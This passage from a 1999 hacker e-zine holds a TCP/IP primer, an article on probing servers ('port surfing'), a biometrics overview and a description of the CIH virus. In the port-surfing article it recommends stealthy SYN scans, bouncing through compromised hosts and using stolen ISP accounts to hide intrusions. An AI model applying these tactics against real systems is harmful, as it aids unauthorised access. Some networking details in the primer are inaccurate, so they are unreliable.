a commercial vendor. Two organizations work with the IAB: the Federal Networking Council and the Internet Society. The Federal Networking Council represents all agencies of the United States federal government involved with the Internet. The Internet Society is a public organization that takes its membership from the entire Internet community. Both organizations provide input on Internet policy and standards. The IETF is responsible for specifying the Internet protocols and architecture. By its own description, the IETF is not a traditional standards organization, although many specifications produced become standards. The IETF is made up of volunteers who meet three times a year to fulfill the IETF mandate. The IETF has no membership. Anyone may register for and attend meetings. The work of the IETF is organized into various areas that change over time. The one consistent factor is the IETF's role as the testing and implementation arm for TCP/IP growth and development. In recent years, new technologies have appeared rapidly on the Internet. A case in point is the World Wide Web, which depends on the HyperText Transfer Protocol (HTTP). The web and HTTP were in wide use long before RFC 1945 established an Internet standard for HTTP version 1.0. Increasingly, evolution of the Internet is being led by network heavy hitters such as Microsoft and Netscape. The slow standards process fails to satisfy vendors who want to establish themselves as leaders on the Net. The only other serious work that has been done comes from the International Standards Organization in the form of the Open Systems Interconnection (OSI). OSI is another set of protocols that provides a similar functionality to TCP/IP. It was widely assumed that they would replace TCP/IP as the open protocol solution, but this has not come to pass. One obstacle with the OSI protocols is the fact that they are governed by international bodies, which sometimes slows down the development process. ------ A Few Services and protocols associated with TCP/IP: Telnet - A remote terminal emulation protocol that enables clients to log on to remote hosts on the network. FTP - A file transfer application that enables users to transfer files between hosts. Stands for the File Transfer Protocol. SNMP - Used to remotely manage network devices. Stands for the Simple Network Management Protocol. DNS - Provides meaningful names like achilles.mycorp.com for computers to replace numerical addresses like 123.23.32.23. Stands for the Domain Name System. HTTP - This protocol, the core of the World Wide Web, facilitates retrieval and transfer of documents. Stands for the HyperText Transfer Protocol. ------ To make TCP/IP work, each and every device on a TCP/IP network requires a unique address. An IP address identifies the device to all the other devices on the network. IP addresses are made up of two parts. The first part of an IP address identifies your network ID. With the Internet spanning the entire globe, every network or part of a network must have a unique ID. This ID is used to route the information being sent to the correct network. The other part of your IP address is the host ID, a unique number that identifies each computer and device on your network that talks using TCP/IP. A TCP/IP address is, simply put, a 32-bit binary number. Looking at an address as 32 zeros or ones is difficult for humans, so we view the address as a dotted decimal address in the following format: 198.53.147.153. Each of the four numbers represents 8 bits of the address and is referred to as an octet. Three main classes of addresses exist: Classes A, B, and C. The most obvious difference between the three main types of addresses is the number of octets used to identify the network ID. Class A uses the first octet only; this leaves 24 bits (or three octets) to identify the host. Class B uses the first two octets to identify the network, leaving 16 bits (two octets) for the host. Class C uses three octets for the network ID, leaving 8 bits (one octet) for the host. Class A: 72.0.0.0 Class B: 112.34.0.0 Class C: 198.173.202.0 A couple of rules determine what you can and cannot use for addresses. Neither the network ID nor the host ID can be represented by all 0's or by all 1's, because each of these conditions has a special meaning. Knowing that the first octet represents the first 8 bits of the address, and by knowing the starting bits for the classes of addresses, you can see the first octet ranges for the respective classes in the table below. Note that Class A does not start with 00000000, since that network ID has a special meaning, and does not end with 01111111 (decimal 127) since that is reserved for loop back. Because the Class A addresses use only the first octet to identify the network ID, there are a limited number of them (126; 127 is reserved). Each of these 126 networks, however, can have many hosts on it: 2 to the 24th power (the remaining 24 bits) hosts minus two (the host IDs that are all 0's and all 1's) equals 16,777,214 hosts on a single network. Class B addresses use the first two octets. The first 2 bits, however, are set to binary 10. This leaves 14 bits that can be used to identify the network: 2 to the 14th possible combinations (6 bits in the first octet and 8 from the second) 16,384 network IDs (because the first two digits are 10, you don't have to worry about an all 0's or all 1's host ID.) Each of those network IDs has 16 bits left to identify the host or 65,534 hosts (2 to the 16th minus 2). Class C networks use three octets (or 24 bits) to identify the network. The first three bits, however, are always 110. This means that there are five bits in the first octet and eight in each of the other two that can be used to uniquely identify the network ID or 2 to the 21st possible networks (2,097,152) each of which has 8 bits for hosts or 254 (2 to the 8th minus 2). The TCP/IP model for networking has only four layers. Each layer covers more functions. They are, Application, Transport, Internet, and Network Access. The Application layer in TCP/IP combines the functions of both the Application and Presentation layers in the OSI model. The Application layer contains various services (protocols) such as NNTP (Network News Transfer Protocol) or SMTP (Simple Mail Transfer Protocol). The WinSock API is also in the Application layer. Just as in the OSI model, the Transport layer is the actual language of the network. All requests use one of two different transport protocols either TCP (Transmission Control Protocol) or UDP (User Datagram Protocol). The TCP/IP Internet layer replaces the Network layer in the OSI model. It deals not only with finding other hosts (computers) on the same network, but with routing information (in the form of packets) to other networks. The TCP/IP Network Access layer replaces the Data Link layer. This layer handles framing the data and transmitting it to the wire. TCP/IP does not use computer names in its communications. Rather, it uses the IP address of the host as the destination for the packet it will send. This means that some method of turning \\comp1 (a NetBIOS computer name) or www.microsoft.com (a host name) into an IP address must exist. Otherwise you would have to memorize many different IP addresses. Many different protocols can be located at the Application layer. All the TCP/IP protocols (applications) and the NetBIOS services, however, rely on the services of two main APIs: WinSock and NetBIOS over TCP/IP (NBT). Windows Sockets (WinSock) provides socket-oriented services to the TCP/IP utilities that can exist at the Application layer and also provides services to NetBIOS. A socket combines a computer's host address with a port number designating a service or application running on the computer. The port numbers serve as end points for communication between the hosts. The port numbers are not normally the same on both ends; services usually use well-defined and well-known port numbers. These well-defined port numbers are controlled and assigned by the Internet Assigned Numbers Authority. When you start a service on your system, the service registers its assigned port number in the system and anything that comes in for that port is sent to that service. Using port numbers allows the WinSock interface and all the underlying layers to ignore what the information is and to just move it from point to point. Included in the information is the address, transport layer protocol (UDP or TCP), and port number that sent the information; this information enables the application to respond directly to that client running on the remote system. The first 1,024 ports are reserved and are used only for services. Any port number up to 65,536, however, is valid. To look at the whole process, the service starts on the server and registers its port number (thereby monitoring that port as shown here). On the other host, the client side application starts. It also registers a port number that it will use (any available port above 1023). The client application can now start to send information to the server by sending to the IP address, transport protocol, and port number. The server then responds to the IP address, protocol, and port number from which it received the information. In this way, there is no reliance on computer names or other upper-level information and absolutely no restriction on which port any particular service can use. Windows NT uses NetBIOS when you work with its redirector and server services (the base Application layer components of Microsoft networking). This means that it requires the underlying protocol to handle requests in the forms of NetBIOS commands. You have just seen that the TCP/IP stack does not use names, nor does it register each service with a name/number combination. On the surface, this would seem to indicate that NT cannot use TCP/IP for a protocol; but, it does. To do this, another layer has to be brought in that maps (or translates) the NetBIOS command into a series of TCP/IP port numbers. This enables the NetBIOS to have a port for transmitting and receiving data, establishing and releasing sessions, and handling NetBIOS names all over TCP/IP. Not surprisingly, the component that handles this function is called NBT or NetBIOS over TCP/IP. It is responsible for the mapping of, and communications between the NetBIOS interface and the various WinSock ports. This means that all communications over TCP/IP must go through the WinSock interface. NBT has also been referred to as NetBT. WinSock has to rely on the Transport layer to deal with data moving to and from it. This is handled by the two Transport layer protocols: TCP and UDP. Computers can have different types of conversations with each other. UDP (User Datagram Protocol) provides no guarantee that the packets will get through. TCP (Transmission Control Protocol), on the other hand, creates a session, and can then guarantee delivery. TCP is used to provide a connection-oriented delivery service for the higher-level protocols. To do this, TCP must first establish a session with the remote communicating host. It does this by means of a three-way handshake. First the host initiating the communications sends a packet to the other host that contains information about itself and a SYN (or synchronize flag) telling the other host that a session is requested. The other host receives this packet and responds with information about itself the SYN flag and an ACK (acknowledgment) of the information that it received. Finally the first host ACKs the information it received from the other, and a session now exists between the two systems. At the end of the communication session, a similar three-way handshake is used to drop the session with the remote host. This ensures that both of the hosts are through transmitting. It closes the session cleanly. Compared to TCP, UDP is simple: The data from the upper-layer protocol is encapsulated and sent. UDP is used to send and receive simple messages; no session is required. The UDP protocol is used, for example, to send and receive broadcast messages. The Internet layer has four main protocols. These protocols work together to provide a best-effort delivery service (guarantees are the responsibility of TCP or higher-level applications). IP (Internet Protocol) needs only to know which IP address to send the data to and the protocol on the other system (TCP or UDP) that should receive it. All devices that use TCP/IP have an Internet layer that includes the routers that provide the backbone for communications across the network. The IP is responsible for taking the packet and determining whether the packet is for the local network. If not, the IP must find a route for the packet to the destination network and eventually the destination host. To understand how the IP determines whether a host is on the local network, you must look at the subnet mask and what its function is. As you saw earlier, the IP address that each host has is a combination of the network ID and the host ID. The address itself is 32 bits long. A varying number of bits are used to identify the network and the host. The discussion here keeps the subnetting simple and works with the standard subnet masks. In a later unit, you will look at using custom subnetting and supernetting. A logical AND enables you to compare two binary numbers and come up with a third that describes the state of the other numbers. What makes it important is that you can use it with subnet masks to split an IP address into a network ID and a host ID. Address Resolution Protocol (ARP) is now used to determine the physical address of the destination host. The physical or MAC (Media Access Control) address is used by network adapter cards to communicate with other network adapter cards on the local network. If the destination host is on a remote network, the MAC address of the router is used. So ARP, using either its cache of resolved addresses or by broadcast, finds the MAC address to send the packet to. In the case of a local machine, this is the actual machine. In the case of a remote system, it is the router. Remember that the router also has the IP layer and so it has ARP. The router finds the MAC address or the host (or another router) on the other network. You never receive the information about the other hosts MAC address; it would be pointless.After ARP has the address, IP sends the packet to that address. Sometimes, however, when talking to hosts on other networks, your packet will have problems. When this happens, you receive notification. ICMP is a diagnostics and messaging protocol used in the TCP/IP stack to enable communications to continue. ICMP handles such routine functions as PING. It also handles important issues such as reporting unreachable networks. When you are considering a network that spans the globe, you have to expect that problems connecting with specific hosts will sometimes arise. A few protocols now in place help to prevent this. Dynamic Routing is one that provides alternative routes if a link goes down. Since it may take a long time to try a lot of alternative routes, a time out value is given to each packet on the Internet. The time out represents the maximum number of hops that a packet can make. By default in Windows NT 4.0, the Time To Live, or TTL, is 128 seconds. Each router decrements the TTL by one for every second that the packet is in the router. If the TTL expires or there is no route to the network you are trying to reach, you receive an ICMP message (request timed out or destination host unreachable). This prevents packets from circulating around the Internet forever, using up bandwidth trying to find a route that may not exist. ICMP also works to manage the flow of data on the Internet by directing traffic. If your router becomes overloaded, for example, and is unable to keep up, it might send a source quench message to your system. This tells your system to stop sending for a while. Routers also send an ICMP message if they detect that a better route to your destination is available. This would be an ICMP redirect message, telling your system to use another router. IGMP is the last of the protocols that reside in the lower layers of the TCP/IP stack. IGMP handles sending and receiving when groups of computers are involved. Sending to groups of computers is used to provide the systems that receive the information with a live feed. This is multicasting, where you get a straight pipe of data. In multicasting, you send the information from your system to a special IP address (a Class D address). You should remember that are Class A, B, and C addresses. Class D, however, is only mentioned here; it is not valid as a host IP address. When a system multicasts, it chooses an IP address (this has to be unique on the network) and sends all the information to that address. If you want to receive the information, you must tell your system to listen for that address. The problem is that your router does not know that it should listen for that address, and the packets don't get into your network. IGMP tells your router that you wish to listen to that address, enabling you to receive multicasts. Just as in the OSI model, the Network Access layer is responsible for framing packets of information for the underlying topology and transmitting the data on the wire. The Network Access layer also grabs the frames off the network. If they are for that MAC address or for broadcast/multicast, the Network Access layer passes them up to the appropriate protocol. There. Hope you have a little more background on the protocols and services out there. Peace|Out. ----- : Digital Avatar : : lambesis@gmx.net : : http://damatrix.cjb.net : ::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 ::: The Discordant Opposition Journal ::: Issue 5 - File 6 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Ancient Art of Port Surfing: cronus You Wha ? What, you might ask, the fuck is Port Surfing ? And that would be a very good question. As you might have guessed from previous articles from me, I like to think myself a bit of a hacker, thus we can conclude that Port Surfing is of grave importance to the humble hacker. Port Surfing is the art of moving your attentions from one port to another on a certain system gaining as much information as possible. With the ultimate goal of finding software that is exploitable. Hows tha then ? The most basic tool for Port Surfing is the portscanner. A portscanner is a piece of code or script that scans a range of port numbers on a certain system looking for open services. Portscanners are easily coded containing no more than a little code to connect to sequential ports and log the results. Since portscanning is such an easy operation, you may ask why then, am I rabbiting on about Port Surfing... Port Surfing is an intimite and personal action that has the effect of getting you closer to the system under inspection. The principle first off... A portscan can only tell you what ports are actually open and running services. It would take allot of programming to create a Port Surfer. Port Surfing involves sending commands at the open service, noting its version and program information and also even trying to use the service manually to get a feel for it. Remember that for each service (mail, web server, etc) there are dozens of varients and upgrades. Each varient and upgrade has specific flaws and weakness's. It is the art of Port Scanning that makes these flaws apparent. Who me ? Its necessary as in most hacking techniques to hide your presence and activity. The simple art of portscanning a server CAN put its defenses on gaurd and force it to reject ALL your further incoming connections. Portscanning can just be a loop that attempts to connect to a port number and log if it can, then move to the next port. But all these connections will be logged in the system logs. So on later inspection your attention will be noticed. The answer is the SYN scan. The TCP three-way handshake consists of an initial data packet from your computer, a reply from the server and a final packet from you, the connection is then open. A program could be made that simply started the connection routine, but didn't actually send the final packet. This would still have to result of discovering if the port is open without leaving a trace of the connection in the logs. Once you physically intend to connect to the port, you should take some small efforts at hiding your presence. Hiding your real connection is also part of Port Surfing. All of the basic ideas of boucing your connection are applicable. Bouncing off vulnerable Wingate systems, setting up 'Back Orific' redirects or even just using an 'aquired' ISP account. I have also done an article on this whole topic for this issue, read that for a more detailed look. Vers and stuff... Connecting to the port number will most likely give you a text output something along the lines of "SSH ver 1.2" or "HTTP/1.2". The basic introductionary text is unnecessary, it is merely advertising for a specific piece of software. The version of the running software is vital if weaknesses are to be found, but the problem is that these outputs can be altered to give false information. I know of a server running Qmail mail software but the port outputs the text "Sendmail 5.0.5" which is a non-existant version of the buggy sendmail daemon. Once you've received all the text information you could try to throw arbitary commands at the server. See if you can get a list of commands and try to work out its real specifications. 'Version', 'info' or even 'help' might all retrieve information. There is no hard and fast rules at this point. This is where Port Sufing becomes an art. You must ad- lib and learn from your attempts. If you find that 'help' gives you an error message, see if the message gives any clues with which to procede. I'm sorry I have to be so vague here, but the art of Port Surfing is not a step-by-step routine, more a hunt guided by gut feeling. Manual (Ab)use ! If you can get a basic outline of how the service works, you might try manually using the service by hand. A HTTP server specifically outputs HTML coded text that is readable by a Web Browser. The specifications of the HTTP commands is fairly basic. Easily typed and understood. I'm not going to go the specifics of server software commands because there are literally dozens of different protocols. The sheer number of possibilities makes the idea undigestable. I be sorry... I realise that this article is getting less and less technical. And for that I apologise. You must see hacking as I do. In the past I have refered to it as a hunt. Trying to find the pray (weakness) before it escapes (patched). You must use gut instinct on the hunt and make decisions at the time, not before hand. If you feel a server that you are 'probing' is somewhat sluggish and yet a Ping on the server shows decent connection times, you might figure out that the server is running out of resources internally - such as CPU processes and Hard Drive space. All of this detecting is an intregral part of Port Surfing. You are trying to get closer to the server. Get to understand its workings. If you find it has peak times of connection speeds you may find that at these times the office is closed. These discoveries help you plan an attack. A traceroute command might show that for some strange reason your connections always bounce through another specific server, this kind of information would seem to point to a router at an ISP or head office. The logical conclusion now would follow that this server acts as a firewall. A firewall usually has a trust based relationship with the protected server. This trust could possibly be exploited. Again another example of what I call theoretical hacking... ... intoxicated with the madness ... cronus (at) iol (dot) ie ___________ ____ ____ __ __ ______ _/ ___\_ __ \/ _ \ / \| | \/ ___/ \ \___| | \( <_> ) | \ | /\___ \ \___ >__| \____/|___| /____//____ > \/ \/ \/ http://homepages.iol.ie/~cronus::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 ::: The Discordant Opposition Journal ::: Issue 5 - File 7 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Biometrics: Infinity Matrix A technology that virtually eliminates all kinds of fraud, biometrics is a very secure practice. It almost can not be bypassed. But I am not here to discuss how to bypass it, I am just going to explain some of the processes, such as fingerprinting and iris/retina scans, etc. A Look Inside NORAD --- Just a small prelude for what's to come. It's a little look inside the security at NORAD's operations base in Colorado. Probably about 95% of the data about NORAD is classified, so my information is very limited. So anyways, here goes. In the early 1960's, more than 690,000 tons of rock were carved out of Cheyenne Mountain to create nearly three miles of underground interconnected tunnels and caverns. A roadway that runs east and west through the mountain. This complex is built to withstand virtually any concievable natural disaster, act of sabotage and war, even multimegaton nuclear strike. Pretty amazing, huh? At The Front Door - The front door isn't exactly a piece of cake to get in. To enter the NORAD complex, a visitor must travel into the mountain on the main road and turn off to pass through a pair of three foot thick steel doors that weigh 25 tons apiece. The outer door is designed to close flush with the rock wall of the roadway, which is open at either end. The roadway thus acts to channel heat and percussion from an explosion through the mountain and away from the doors and the complex behind them. And, I doubt you would, but if you try to break in, uhm, your result: Big guys with guns. The ShockProof Structure - Each building in the complex rests in its own granite cavern on steel springs that let the structure roll with any shockwaves that penetrate the mountain, no part of the building touches the rock. Friction dampers, like giant shock absorbers, further reduce the shaking that could result from an earthquake or a nuclear explosion. Wire mesh on the wall protects communication and power cables from rockfalls. To counter the tendency of granite to shift under it's own weight, expandable bolts, ranging in length from 6 to 32 feet, are inserted into the rockface to form a compresses layer that strengthens the walls of the caverns. ================ Smart Cards --- First and foremost, I want to talk about smart cards. These aren't exactly biometrics, but they are an advanced identification method. Smart cards are the new answer to the traditional locks and keys to limit access to sensitive areas. Why this has taken place, because keys have a way of getting stolen and/or copied. There are basically three types of smart cards. Each of these smart cards can employ an identifying number or password that is encoded into the card itself, all pretty much out of the reach of an average criminal. Anyways, back to the three types of cards. Magnetic Watermark - During manufacturing of the tape, magnetic particles used to encode the card's permanent identification number are set in zones of varying width at alternating 45 degree angles the tapes longitudal axis (up and down). Data may then be encoded on the tape, but the identifying structure of the tape itself cannot be altered or copied. A card reader with a special head and circuitry is needed to scan the watermark. Optical Memory Card - Tiny dots representing binary ones and zeroes are either photographically etched onto the storage strip during manufacturing or burned in with a very small, low-powered laser beam. The card, which can hold the equivalent of a 400 page book on its 3 1/4 by 1/2 inch strip, is sealed with a protective layer that cannot be removed without destroying data and voiding the card. Microchip Card - The card's penny-sized microchip contains a processor and tree types of memory, totalling 21,800 bits for storing programs and data. Sensitive information, such as the cardholder's password and personal information is kept in the so-calle 'secret zone' in the card's read only memory. This zone is encoded during manuafcture, and is not accessible even to the card's owner. ================ The ManTrap The ManTrap is a simple structure that protects from intruders by verifying the identity of users. Here is the process it uses. 1. After entering the identification booth, a user punches in a pass number on a 12-button keypad, signalling the computer to retrieve the voice template and weight record registered by the person assigned that number. 2. Through an overhead speaker, the computer broadcasts a four-word phrase randomly selected from the 16 words previously registered. 3. The user repeats the phrase into the microphone and the sounds are digitized for comparison with the record on file. 4. If the voice patterns match and the weight on the floor scale is no more that 40 pounds over than the registered weight on the record, the exit door leading into the data-processing center will automatically unlock. If a user is not verified after seven tries, security is alerted. Again, big guys with guns. ================ Signatures --- Forging a signature has become one of the most useful tools in fraud. Many people have gotten patcheck, checks and other thing issued to them because they forged a signature on something. Now, you may not think this would work very well, but technology have come up with some pretty amazing stuff to make these signatures a useful and easy device to test user identity, with stuff like acceleration sensors and pressure sensors built into the pen. I know no-one could forge mine; it looks like a major seismic event. But anyways, here is how the biometric signature-recognition pen works. The biometric pen converts a signature into a set of three electrical signals by means of piezoelectric transducers, ceramic devices that generate measurable voltages in response to stress. A good example of these being used was in Rudy Rucker's The Hacker and the Ants, the piezoelectric transducers were fitted into gloves used in cyberspace, and they would contract and such so it gave the user feeling. Even though this is complete fiction in this time, it is still a good example. One transducer senses change in the writer's downward pressure on the penpoint, farther up the pen shaft, two transucers set at right angles to each other measure vertical and hrizontal movement. Although the computer does not need a visible signature, the pen also includes and ink cartidge because tests have shown that people sign more accurately if they see what they are typing. Signals from the pen's sensors are translated into a trio of electrical wave forms, one representing changes in the downward pressure, the other two representing acceleration along the pen's vertical and horizontal axes. The crossing of a t, for example, would register as a high point in the horizontal and a low point in the vertical wave form, where as the dotting of an i would produce a peak in the pressure- change wave while leaving both of the acceleration wave forms relatively flat. A curved or diagonal stroke, for its part, would create action in both sensors. ================ Voice Signatures --- Vocal Signatures have become a fad in movies, where people say things like "Hello, this is Joe Blow, my voice is my passport, verify me." (From the movie Sneakers - a very good one at that.) As you may have noticed, it is kind of easy to tape-record a person's voice, so this seems a bit easy to bypass. And here's how it works. For purposes of analysis, the computer focuses mainly on the simplest characteristics of a voice. Its acoustic strength. This changes during a spoken phrase from silence to varying degrees of loudness. To isolate personal characteristics within these fluctuations, the computer breaks the sound into its component frequencies and analyzes how they are distributed. On a spectogram - a visual representation of the voice - the high-amplitude frequencies are indicated by bright spots called formants is determined by the unique shape and movement of the speaker's lips, tounge, throat and vocal chords. ================ Iris/Retinal Scans --- Each person carries something other but just as different as a fingerprint in the back of their eye, the fine tracery of blood vessels. This method, in my opinion, is one of (probably) the best sort of biometric security, other than fingerprints. This system uses an infrared beam to scan the eye in a circular motion. A detector in the eyepiece measures the intensity of the light as it is reflected from different points. A detector in the eyepiece of the device measures the intensity of the light as it is reflected from different points. Because blood vessels do not absorb and reflect the same quantities of infrared as the surrounding tissue, the eyepiece sensor records the vessels as an intricate dark pattern against a lighter background. The device samples light intensity at 320 points around the path of the scan, producing a digital profile of the vessel pattern. (Only one inspection is necessary, since a person's retinal print, or retinal signature, does not change as the voice or written signature does.) The algorithm in the system's software then compresses the digital profile into a reference template. Enrollment can take as little as 30 seconds and verification can be even faster: The user types in an identification number to call up the reference template from the computer's memory and then looks into the eyepiece for a retinal scan. In only a second and a half, the computer compares the scan results with the template and grants access if the two signatures are close enough. ================ Hand Geometry --- Kids in school trace their hands in school and often notice that no two are alike. This method employs a scan that maps the geometry (Shape, bones, etc.) of the hand, and compares that to the scan. A user enrolls in a hand geometry system by placing his/her hand on the metal plate of a reading device, positioning the middle and ring fingers on either side of a small peg and aligning all the fingers along narrow grooves slotted with glass. An overhead light shines down on the hand, and a sensor underneath the plate scans the fingers through the glass slots, recording light intensity from the fingerprints to the webbing where the fingers join the palm. The device measures each finger to within 1/10,000 of an inch, marking where the finger begins and ends by the varying intensities of light. The information is digitized and stored in the system as a template or coded on a magnetic-strip ID card. Despite the uniqueness of individual hands, the method is not foolproof. For example, if a user is enrolled in the system wearing heavy nail polish, the sensor would not detect the true ends of the fingertips, which would be hidden by the dark nails. The computer would thus be unable to verify the person's identity if she tried to gain access after removing the nail polish. ================ FingerPrinting --- Fingerprint identification is based on the anatomical truth that no two fingerprints are the same; each has a unique pattern of figures, such as loops, whorls and arches. But this can easily be fooled. If there is a scrape, or some kind of dirt or smudge, the computer cannot properly identify the print. At enrollment, data samples from a scan of the user's fingerprint are interpreted as varying degrees of gray and assigned a numerical value. This gray scale representation is processed by a complex algorithm, which pats special attention to the places where clusters of light and dark points indicate that a ridge has divided or ended. The system is designed to analyze these minute ridge splits and endings, ascertaining their positions relative to the core of the print and to one another; the system also analyzes the angles of the ridges. These relationships remain unaltered even when a print's impression is faint, dirty or distorted. Several readings are taken and manipulated by the algorithm to create a stored template. A user wishing to gain access to a secure area merely enters an identification number to call up a template, places the same finger in the scanner and waits a few seconds for a verification analysis. If the prints are a close enough match, access is granted. ================ Almost all of the methods of biometrics can be dumbfounded. Biometrics is not very secure in my opinion, and just ask Biosone. He thinks biometric security sucks. And, well, it does. In my opinion anyways. Do I know my shit, or what??? :-) Thanx to Fraggle, RELM, Biosone especially... and magickal1^ All you guys rule... thanx. --InfinityMatrix http://imasylum.cjb.net matrix@pobox.alaska.net ::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 ::: The Discordant Opposition Journal ::: Issue 5 - File 8 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :The Chernobyl Virus: RELM ------------------------------------------------------------------------ The Virus: There are many types of CIH viruses out there in the wild but there's only one that leads the pack, this is the Chernobyl CIH virus. The Chernobyl virus is probably one of the most destructive CIH viruses yet and can be a bugger to get rid of. There are a few different variants of this virus, two of them trigger on the 26th of April, one on the 26th of June and one that triggers on the 26th of every month, I will be talking about the one that triggers on the 26th of every month. All you people who stick to *nix are safe from this nasty little virus and so are you Win NT peeps but all the rest of you Win 95\98 people are naked to this virus so I suggest you put some damn clothes on. In this text I hope to go over the characteristics of the Chernobyl CIH virus and explain some important issues that may concern your personal security against such viruses. ------------------------------------------------------------------------ The Life: Well say you have this little virii Chernobyl on your puter, well first you would run the infected executable (Doh!) and this making the virus memory resident. Since the virus is now memory resident every file that you open or copy will be infected with the virus also..ewwww . ------------------------------------------------------------------------ Hide And Seek: When the virus is going to infect a file it will scan the file for free space, It then breaks it's own code into chunks and inserts itself into the free space in the file. Doing this makes it so the infected file doesn't change size after the infection. Wow...now you have a hole bunch of files infected with this little basterd but you don't know it because everything's just like it should be so you go on about your business and kick your ass later. ------------------------------------------------------------------------ Virus Has An Attitude: Now that you have this sweet little cute babe virus on your puter it's just going to sit there and look cute, well just like real kids they grow up and turn into assholes so let me explain this virus's trigger actions. On the 26th of the month the payload activates an action, the virus write's over 1MB of the systems hard drive with random data. Now to really screw you over it will also attempt to modify or corrupt certain types of Flash BIOS (The virus will only do this function if you have a Flash BIOS, A Flash BIOS means that you can write data to the BIOS, This function was made to make it easier to upgrade the Bios). Now if you don't know what this means it means that it might destroy the BIOS of your computer, the BIOS loads your OS and manages the data transfers between your system devices such as your hardrive, mouse, keyboard, serial ports and your parallel ports. After the virus corrupts your BIOS your computer becomes inaccessible, to fix this you might have to replace the BIOS or deal with it in some other manner. ------------------------------------------------------------------------ Protecting Yourself: This is a cruel world and there are mean people out there who get off on destroying peoples property that they have paid for by working there ass off. (Note. I don't agrea with any side, The Anarchist's or the White Hat people. From learning and experiance I have learned that it's better not to take sides but to just get along with both, Doing this lets me have a even wider range of possible knowledge that I can learn and explore) To protect yourself against such people who wish to destroy your property with no reason I suggest you first learn the basics of working with the internet, For one, You should never except files from someone you dont know. Second, Never open an executable that was unzipped without scanning the file for viruses first, Doing this is just plain stupid and your most likely to get a virus. (Use a Mcafee scanner or Nortan Anti-Virus). When you do download zipped files scan them with a good anti-virus software, Dount use cheap programs only use Mcafee or Nortan Anti-Virus. Third, Make sure you allways have the latest virus defenitions for your anti-virus software. Fourth, Keep up on the latest security issues and learn how to protect yourself from them, Allways know about the latest viruses because before you know it you might get one and you could have been prepared, Like they say...To Kill Your Enemy You Must Know Your Enemy. One final suggestion is that you scan your computer for viruses daily, If not daily at least do it weakly. I scan my computer for viruses sometimes twice or even three times a day, This is because I do alot of downloading and I have to make sure I dount get infected. Ohya, It's a good idea if you do alot of downloading of programs, software ect. that you do virus checks more often, Doing this might lower your chances in getting loss of data or even hardware damages. ------------------------------------------------------------------------ Benifets Of Viruses: Allthough viruses are naturelly cruel and usually don't have good intentions there are some that have a good cause or are helpfull in breaking into a system (A good cause for your end not necessarally the victims). There are a few viruses out there that open all available ports on a machine at a requested time, This might be helpfull to you depending on what you are doing or say you wish to break into a system but they have some type of security, well you could make a virus to be able to take down that security and then enableing you to have a chance to get in the system. Though most "Hackers" do not use viruses to help them get into a system it is an alternative that you might need one day. I have some words of wisdom and I tell it to allmost every newbie I see and this is to stay away from trojans such as BO (Back Orifice) NetBus and all the other destructive and un-ethical trojans, If you wish to be a hacker your tools must come from your mind, Useing trojans is not hacking and it doesnt take a brainy to get into a system thats patched the real adventure is getting into systems useing your brain and not some toy, Of course you will need tools to hack but that comes later, First you must have the right state of mind, A clear understanding of the hacker community and the way it works. Hmm..I've kind of wonderd of into newbie talk land here..sorry about that, It just bugs me to see all these people every day come into IRC and say " Can Some One Teach Me To Use Netbus? " and Im sure theres many of you out there who feel the same way. Well enuff with this ;) ------------------------------------------------------------------------ The Chernobyl Virus Source Code: ; This was going to be the spot for the Chernobyl source code. ; I decided not to include the source code due to that this ; virus is such a destructive one and there are so many people ; who would use it for more the learning perposes. In most of my ; virus texts I include the source code but for this one I made ; an exception. You can allways read my many other virus texts ; such as the Alar Virus, Melissa Virus ect. and they all ; include the full source code for the virus. As I say in ; all my texts that include the source code I ask that you only ; use it for learning perposes, Im not just saying this for a ; disclaimer Im really serious about this and I should not be ; used for anything else. Thanks. This concludes The Chernobyl Virus text Written By RELM. Shout Outs To: All Of The Fallen Angel Members..You Rule! And All The Peepz At #hackerzlair. -peace /\ |\________/ \ | _______\/\ \ | |____ / /__\ \ | ____\ ______ \ | | / / \ \ | | / / \ \ | | / / \ \ | |/ / \ \ | |_/ \_\ | | | / |/ [fallenangelz.cjb.net] ::::::::::::::::::::::::::::::::::::::::::::::::::::::::May/99 ::: The Discordant Opposition Journal ::: Issue 5 - File 9 ::: :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: :Dr. Klep Speaks: Written by Kleptic Welcome to another installment of "Dr. Klep Speaks". In this issue, and in most of the other issues, we will be talking about what ever im pissed off about. I'll be ranting about School Shootings, and why schools are now banning backpacks, cargo pants, and even baggy pants at certain schools. I will also be talking about the art of choosing a good computer handle. And I'll probably be ranting about what people think is lame, and what others think isnt lame. Enjoy! =================== Contents =================== 1. School Shootings 2. Banning Backpacks, Cargo Pants, and Baggy Pants 3. How Do You Get A Good Computer Handle!? 4. Lame Or Not Lame!? That Is The Question! ==================== School Shootings ==================== Well, all these bomb threats, and school shootings.. They're horrible, why would some sicko(s) come into a school of innocent kids and blast them with a high-powered rifle. This is a short section in this installment. But Im sure all of us here at DoJ are all sorry for what happened at Collumbine High School.. and any other school shootings that happened around the world. ===================== Banning Clothing? ===================== Well, because of all the school shootings, some schools are now planning on banning backpacks, cargo pants, and even baggy pants. Now personally I think thats gay. I dont know anyone that would want to carry around a ton of heavy books all day, when its a ton easier to just pop them in a backpack and carry them on your back. And cargo pants!? Thats pretty dumb too. I mean I can understand how people can hide weapons and stuff inside there cargo pockets, but still.. a lot of people wear cargo pants, and some people would even have to buy a whole new wardrobe just for the dumb school dress code! And baggy pants!? Who is going to determine what is baggy and what isnt? Some kids wear like 30" legged pants, and they think that 12" is tight.. and viseversa. I dont think that they can even ban clothing like that. People will always disobey the rules and wear there pants sagged, or really big.. and people will always try to express them selves in different ways.. The only way they can really do this is making all public schools wear uniforms, and I dont think they will even do that. All in all.. its pretty dumb. =========================== The Art of making a handle =========================== Hackers, phreaks, crackers, warez d00dz, and even phishers need a handle.. but some kids new to the underground dont have any taste, and they pick a lame ass name. First of all your handle should go with your personality. Like me, my handle is KLEPTIC, Kleptic meaning: person who has a urge to steal things with out even knowing it.. and I used to steal info on the net all the time.. The new age of so called "hackers" have no taste in choosing a good computer handle. They pick nicks with a ton of "elite hax0r writing".. word of advice for those of you picking a new handle. Be creative.. dont use pre-existing hacker names, dont use those gay ass names from the movie Hackers.. remember your name gives you personality! ============================ 